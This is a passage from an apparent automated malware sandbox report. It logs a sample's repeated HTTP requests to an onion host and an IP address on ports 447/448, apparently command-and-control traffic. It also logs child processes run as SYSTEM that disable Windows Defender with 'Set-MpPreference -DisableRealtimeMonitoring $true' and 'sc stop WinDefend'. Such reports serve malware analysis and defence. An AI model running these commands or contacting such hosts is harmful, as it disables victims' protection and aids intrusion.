| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 5.188.108.22/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Read Response | size = 3813, size_out = 3813 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 4124, size_out = 4124 |
|
1 | |
| Read Response | size = 431, size_out = 431 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 0 |
| Contacted Hosts | - |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | cd4fhnyg2337dgxk.onion |
| Server Port | 448 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = cd4fhnyg2337dgxk.onion, server_port = 448 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 5.188.108.22, server_port = 447 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 5.188.108.22/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Read Response | size = 3813, size_out = 3813 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 4124, size_out = 4124 |
|
1 | |
| Read Response | size = 431, size_out = 431 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | cd4fhnyg2337dgxk.onion |
| Server Port | 448 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = cd4fhnyg2337dgxk.onion, server_port = 448 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 5.188.108.22, server_port = 447 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 5.188.108.22/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Read Response | size = 3813, size_out = 3813 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 4124, size_out = 4124 |
|
1 | |
| Read Response | size = 431, size_out = 431 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| Server Name | cd4fhnyg2337dgxk.onion |
| Server Port | 448 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = cd4fhnyg2337dgxk.onion, server_port = 448 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 5.188.108.22, server_port = 447 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 5.188.108.22/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Read Response | size = 3813, size_out = 3813 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 4124, size_out = 4124 |
|
1 | |
| Read Response | size = 431, size_out = 431 |
|
1 | |
| Close Session | - |
|
1 |
Process #26: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x22c |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
130
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x3ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a580000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:31:33 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932253 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15866395746 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #27: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7dc |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
7D8
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 208, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x8a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a580000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:31:33 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932347 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15875622737 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000424 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #28: powershell.exe
826
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3ac |
| Parent PID | 0x22c (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
78C
0x
9B0
0x
9AC
0x
668
0x
9CC
0x
9D4
0x
9E0
0x
95C
|
Host Behavior
File (392)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
